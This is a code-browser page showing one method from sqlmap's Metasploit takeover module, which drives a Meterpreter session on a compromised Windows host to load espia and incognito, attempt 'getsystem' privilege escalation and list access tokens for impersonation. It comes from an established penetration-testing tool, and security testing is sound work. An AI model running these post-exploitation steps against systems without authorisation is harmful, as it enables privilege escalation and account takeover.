MCPcopy Index your code
hub / github.com/sqlmapproject/sqlmap / _loadMetExtensions

Method _loadMetExtensions

lib/takeover/metasploit.py:455–488  ·  view source on GitHub ↗
(self, proc, metSess)

Source from the content-addressed store, hash-verified

453 self.execCmd(cmd, silent=True)
454
455 def _loadMetExtensions(self, proc, metSess):
456 if not Backend.isOs(OS.WINDOWS):
457 return
458
459 send_all(proc, "use espia\n")
460 send_all(proc, "use incognito\n")
461
462 # This extension is loaded by default since Metasploit > 3.7:
463 # send_all(proc, "use priv\n")
464
465 # This extension freezes the connection on 64-bit systems:
466 # send_all(proc, "use sniffer\n")
467
468 send_all(proc, "sysinfo\n")
469 send_all(proc, "getuid\n")
470
471 if conf.privEsc:
472 print()
473
474 infoMsg = "trying to escalate privileges using Meterpreter "
475 infoMsg += "'getsystem' command which tries different "
476 infoMsg += "techniques, including kitrap0d"
477 logger.info(infoMsg)
478
479 send_all(proc, "getsystem\n")
480
481 infoMsg = "displaying the list of available Access Tokens. "
482 infoMsg += "Choose which user you want to impersonate by "
483 infoMsg += "using incognito's command 'impersonate_token' if "
484 infoMsg += "'getsystem' does not success to elevate privileges"
485 logger.info(infoMsg)
486
487 send_all(proc, "list_tokens -u\n")
488 send_all(proc, "getuid\n")
489
490 def _controlMsfCmd(self, proc, func):
491 initialized = False

Callers 1

_controlMsfCmdMethod · 0.95

Calls 3

send_allFunction · 0.90
isOsMethod · 0.80
infoMethod · 0.80

Tested by

no test coverage detected